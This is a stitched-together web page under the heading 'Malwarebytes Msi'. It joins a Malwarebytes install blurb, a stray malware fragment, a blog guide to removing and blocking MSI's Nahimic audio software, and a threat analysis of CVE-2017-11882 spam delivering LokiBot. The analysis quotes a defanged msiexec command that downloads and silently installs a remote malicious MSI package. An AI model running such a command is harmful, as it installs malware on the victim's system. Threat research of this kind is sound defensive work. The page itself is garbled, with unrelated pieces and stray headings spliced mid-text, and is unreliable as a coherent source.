Malwarebytes Msi

admin 11/22/2021
35 Comments
  1. Malwarebytes Msi Gpo
  2. Malwarebytes Msi Switches
  3. Malwarebytes Compatible With Macos Big Sur

Malwarebytes Anti-Malware is available to business customers via download from the Malwarebytes website. Once downloaded, you can install Malwarebytes Anti-Malware by either launching the setup file in a graphical user interface, or by using the command line interface. This article guides you through installing via the command line interface. Malwarebytes detects Windows registry changes caused by common Group Policy Objects as PUMs. Enabling this feature automatically excludes 18 registry keys. This ensures our protection capabilities do not interfere with common business applications or operating practices. Malwarebytes has vaporized ransomware, and it runs silently unless it detects a serious threat that we need to investigate. It has been outstanding.' Kevin Merolla, Global IT Security Engineer, Chart Industries. A small number of our machines have created balloon tips that a new version of Malwarebytes Corporate v1.80.2.1012 is available and if I select the update option, the application is downloaded and updated to v1.80.2.1012, but I cannot find anywhere on the website any reference to the executable f.

February 20, 2021

For downloaded files (.exe.msi, or dump files from zip), the malware uses the filename jesus or dump. For created.txt files, the filename varies between desktop.txt, desktop, and desktop.ini. The malware can also initiate a system shutdown.

Want to just completely uninstall Nahimic? Skip to the current instructions.

Is Nahimic malware or bloatware?

Like many MSI motherboard customers I’ve found a strange piece of software popping up on my computer called Nahimic. MSI touts this as some kind of breakthrough in audio being bundled as bloatware, but as far as I can tell many would call it malware due to its behavior.

This comes as a suggested driver update that Microsoft Windows Update will install automatically.

When installed through a Windows update the software does NOT come with any mechanism to uninstall it. Nahimic will also re-install itself via a helper service upon reboot if you simply delete its executables. Furthermore if the helper service is disabled, executables are deleted and drivers are uninstalled, Windows will immediately reinstall Nahimic on the next update. Is this essentially malware behavior? You tell me.

Apparently there are several other ways you might be getting Nahimic. Some claim MSI bundles it with Dragon Center and apparently you can install it from Microsoft’s store. I hear the Dragon installed version is similarly insidious, but I imagine the store would let you uninstall it. I use neither, so I can’t confirm.

Uninstall

I initially checked out a reddit guide thread which you can see in the earlier screenshot, but found it really didn’t stop this behavior. The next update would simply re-install this Nahimic garbage, which could be tested by simply checking for updates. Another user suggested using group policy and linked to some documentation. I was successful with this method and sent the original poster a screenshot, I believe he has or will update the thread.

Steps to Disable Nahimic

Before we get started:
You will need to be a user with Administrator privileges. You will also need to pay attention to Windows Home vs. Pro/Enterprise instructions as they diverge in the guide.

Stopping Nahimic Helper Service

First we need to open the Services application which manages Windows Services. This can be done by typing “Services” in the start menu search or by running services.msc by right clicking on the Windows logo of the start menu button and selecting “Run”. You will see a new screen, scroll down and find the Nahimic Service.

Double click on “Nahimic service” and press the Stop button.

Then select “Startup type: Disabled”. and click Apply, then OK.

This will keep the service from messing with us while we work.

Killing Processes

Installer

The prior step should kill off Nahimic processes, but just in case we can double check. Open up Task Manager, which you can find in the start menu search bar, by right clicking on the windows logo of the start menu, or pressing Ctrl+Shift+Esc.

The two highlighted processes, if they exist, should be killed. Select them and press the “End task” button or right click and select “End task”.

Blocking Future Installations

This is where paths start to diverge. Pro users of Windows operating systems will be able to implement a much more robust solution than Home users to block future installs. Home users can try various tutorials online to install Group Policy Editor, and follow the Pro instructions, but this is not guaranteed to work.

Instead Home users can use a different solution that will at least prevent the same version of Nahimic from installing itself, which will require you to follow these steps whenever a new version of Nahimic comes out.

Windows 7/10 Pro & Enterprise Edition Instructions

Uninstalling Devices & Drivers

Type “Device Manager” into your search in the start menu or browse to it in the Control Panel. In this screen there are two drivers we’re interested in, the first is the “Nahimic mirroring device” found under “Sound, video and game controllers” section. Right click on it and select “Uninstall device”.

A new prompt will open, make sure to check “Delete the driver software for this device.” before clicking Uninstall.

Malwarebytes Msi Gpo

Now you will do the same for the A-Volute device found in Software Components -> A-Volute Nh3 Audio Effects Component. Right click on it and select “Uninstall device”. Make sure “Delete the driver software for this device.” is checked and click Uninstall.

Use Driver Store Explorer to Delete Remaining Drivers

You should download this very nifty tool made by Teddy Z (lostindark) called Driver Store Explorer and unzip it somewhere on your computer. Now open up that folder and run it by double clicking on Rapr.exe. You should get a screen like this:

Here you should look for any entries from A-Volute or Nahimic. In my case I see that there is a leftover A-Volute inf file. I’m going to tick its checkbox and then tick the “Force Deletion” checkbox on the right panel and click “Delete Driver(s)”.

A box will ask you to confirm, you should go ahead and do so.

Blocking Nahimic Installs With Group Policy

Group policy is a feature available to Pro and Enterprise users which allows you to create custom rules for how Windows behaves. This is typically used in professional environments where such rules are important to the workloads, security, compliance, automation, and other concerns of a specific organization.

We will leverage this functionality to prevent Nahimic from infesting our systems. First you need to launch the policy editor, type “Edit group policy” into the start bar search and select it. Alternatively right click on the Windows logo of the start menu and select Run and type gpedit.msc.

With the policy editor open select Local Computer Policy -> Computer Configuration -> Administrative Templates -> System -> Device Installation -> Device Installation Restrictions.

Once you’ve clicked on the Device Installation Restrictions section you can now see a list of policy settings on the right side. You should select the “Prevent installation of devices that match any of these device IDs” policy and double click on it. A new window should open.

Malwarebytes Msi Switches

In this new window you should select the “Enabled” radio button on the left side and tick the “Also apply to matching devices that are already installed” checkbox on the left bottom.

Now click the “Show…” button which will open a new prompt. Here you can enter Device IDs line by line. Enter the following two device IDs:

Then click OK to close this prompt. Click Apply in the previous prompt and then OK.

You should now see that the policy is Enabled. Congrats, if you did all of this correctly devices with matching Device IDs should no longer be installable. You can now continue on to the cleanup section of the guide.

It is possible those IDs may change in the future. The way I found the IDs was to look at the properties of the two drivers we’re disabling in Device Manager. There I was able to get at the “Hardware Ids” (which are the Device IDs) from the Details tab.

Windows 7/10 Home Edition Instructions

Disabling Devices & Drivers

Type “Device Manager” into your search in the start menu or browse to it in the Control Panel. In this screen there are two drivers we’re interested in, the first is the “Nahimic mirroring device” found under “Sound, video and game controllers” section. Right click on it and select “Disable device”.

A prompt will ask you to confirm and you should do so. Now you will do the same for the A-Volute device found in Software Components -> A-Volute Nh3 Audio Effects Component. Right click on it and select “Disable device”.

Why do we disable devices instead of uninstalling them along with the drivers like Pro users? Because we’re not able to use Group Policy Editor to create a policy to block future installations. By leaving the devices and the service disabled Windows will think everything is fine during updates.

Unfortunately when a new version of the Nahimic software comes out, it is likely Windows will update and re-enable all of this. So far I’ve seen one such update in the last 4-5 months. Much better than every 24 hours!

Cleaning Up Loose Ends

We will now perform some final cleanup tasks and then give the computer a reboot.

Deleting Registry Entries

Nahimic has created a bunch of registry entries which we can now remove. In your start menu search type “Registry Editor” and open it. Alternatively right click on the Windows logo of the start menu and type regedit.exe.

We want to delete the entries listed above. Select the first entry and paste it into the path block at the top of the Registry Editor, then press Enter. Now right click on the “NahimicService” entry on the left side of the screen and select Delete. Confirm that you want to do this when prompted.

Now do the same for the other two entries.

Deleting Stale Files

Nahimic has written files on your file system and it is worth deleting the following to avoid executing them:

To do this fire up File Explorer which is the normal Windows file manager. You can also click on the “This PC” icon on your desktop. You can navigate to the first location by browsing to C:WindowsSystem32. Select the A-Volute folder and delete it.

There may also be other nahimic files in System32 such as C:WindowsSystem32NahimicService.exe which may also be worth deleting. If you’re following the Pro/Enterprise instructions typically the steps had removed those files so you may not find them.

Now if you type %LocalAppData% into your File Explorer path field you will be directed to your users Local Application Data folder. Here you can delete the NhNotifSys folder.

Reboot Your Computer & Run Windows Update

You should now reboot your computer. Once it’s back up run Windows Update. After it checks for updates you should verify that Nahimic is still gone. If you followed these steps it should be entirely absent from your system and blocked from future installs.

Windows Home users aren’t quite as lucky as future versions of Nahimic will get installed, but that isn’t as frequent as every windows update and provides some relief.

Conclusion

I think it’s entirely unreasonable that something this insidious is being bundled. MSI should certainly think about what it’s forcing on its customers. At this point I will definitely buy a different motherboard from their competition as this is unacceptable.

Users overwhelmingly do not want bundled software they can’t opt out of. Especially when said software launches itself out of the blue and takes over your audio. MSI is completely tone deaf with this move. Based on what appears to be a Nahimic rep’s posts on reddit so is the company that makes Nahimic.

Cyber Threats

Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation—via the Windows Installer service in Microsoft Windows operating systems.

Back in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected Microsoft Office. However, this didn’t prevent cybercrime groups such as Cobalt from exploiting this vulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki infostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets.

Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation—via the Windows Installer service in Microsoft Windows operating systems. This differs from previous malware that exploited the vulnerability using the Windows executable mshta.exe to run a Powershell script, which is used to download and execute the payload. This attack uses msiexec.exe as part of the Windows Installer service.

Infection Chain

Figure 1. Infection Chain for the attack

The samples we analyzed seem to be part of a malware spam campaign. It starts off with an email that asks the recipient to confirm a payment they made to the sender. The email contains text written in Korean, which is roughly translated as “hello, please check if your PC may be infected by virus or malicious codes,” apparently to warn the recipient about possible infections.

The email also contains an attached document file labeled “Payment copy.Doc” (Detected by Trend Micro as TROJ_CVE201711882.SM) which is supposedly a payment confirmation document. However, the attachment is actually used to exploit CVE-2017-11882.

Figure 2. Spam email containing the document file used to exploit CVE-2017-11882

Figure 3. How the document will appear to the user

The exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled zus.msi via Windows Installer through the following command line:

Call cmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi

Figure 4. msiexec download and installation. msiexec.exe gives the binary the file name MSIFD83.tmp

Figure 5. MSIL binary after installation

Once downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.

One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary.

The binary launches another randomly-named instance of itself. This instance will be hollowed out and replaced with the malware payload.

Figure 6. Hollowed out instance of MSIL debugger view

So far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA). However, it is modular enough to deliver other payloads.

Figure 7. The malware sample we identified as a LokiBot variant

Why does it use a new installation method?
Security software has become proficient at monitoring possible downloader processes such as Wscript, Powershell, Mshta.exe, Winword.exe, and other similar executables that have become increasingly popular methods of installing malicious payload. Due to their widespread use, it became easy to stop the arrival of threats via these software. However, the use of msiexec.exe to download a malicious MSI package is not something we typically see in most malware.

While other existing malware families use msiexec.exe, such as the Andromeda botnet (Detected by Trend Micro as ANDROM family), the difference is in how this method uses the installer. In Andromeda’s case, code is injected to msiexec.exe to download updates and download the payloads. Another key difference is that when Andromeda downloads its payloads and updates, it immediately downloads and executes a PE file. This method uses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as intended.

Malware has never really needed to install itself through an MSI package. Unlike most malware that use msiexec.exe, the malware we analyzed does so without modifying the binary or its processes, and uses the available functionality of Windows Installer to install malware. In addition, MSI packages are typically abused for malicious purposes to install Potentially Unwanted Applications (PUA) and not by malware per se. This is a new direction for malware creators.

Malwarebytes Compatible With Macos Big Sur

Why the use of this specific installation type? We believe it might represent a new evasion mechanism for malware creators to skirt around security software that usually focuses on traditional installation methods. While we did manage to detect samples of the malware payload in limited numbers, we cannot definitively say if these samples are being delivered via the method described. What we can surmise, however, is that the malware creators might be focusing on Korean targets given the language used in the sample email. They could also be testing different ways of delivery — like this new attack method — to determine their effectiveness.

Mitigation
Given the use of phishing emails as the primary method of propagation, both users and organizations can mitigate the impact of this particular attack by implementing best practices designed to combat email-based threats.

Context is very important in this instance. For example, recipients should be suspicious of any email that asks for the confirmation of payment receipts or deliveries for non-existent transactions. Any unusual messages, sentences or phrases should also be a red flag for recipients. Again, in this case, the inclusion of a warning to check for any suspicious software is quite out of place in a supposed payment confirmation email. Communication that involve business transactions are also often highly professional, so any misspellings or grammatical errors, especially if excessive, could signify a phishing attempt.

Another option that is more specific to this attack would be to disable or restrict Windows Installer itself to prevent potential attackers from installing software on the user’s systems, or set the system to only install programs set up by a system administrator.

Trend Micro Solutions
Trend Micro™ Deep Security™and TippingPoint provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities.

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.